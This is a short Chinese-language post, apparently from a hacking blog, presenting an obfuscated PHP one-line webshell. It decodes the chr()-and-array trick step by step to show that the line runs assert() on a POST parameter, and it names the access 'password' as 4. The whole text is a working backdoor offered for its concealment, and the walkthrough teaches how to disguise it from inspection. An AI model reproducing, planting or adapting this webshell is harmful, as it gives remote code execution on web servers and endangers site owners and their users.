?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ? 一个隐藏性很强的pHp一句话 $a=r
>
一个隐藏性很强的pHp一句话
$a=range(1,200);//$a是一个1~200的数组
chr($a[96-1+1])……//$a[96-1+1]就是取数组$a的第96-1+1个元素 也就是$a[96];也就是97(因为数组是从0开始的)chr(97)就是a 按这个方法继续看
$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]);
$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
$b=”assert”;
下面同理
chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83]) = _POST
chr($a[51]) = 4
所以连起来就是
assert(${_POST}[4]);
密码就是4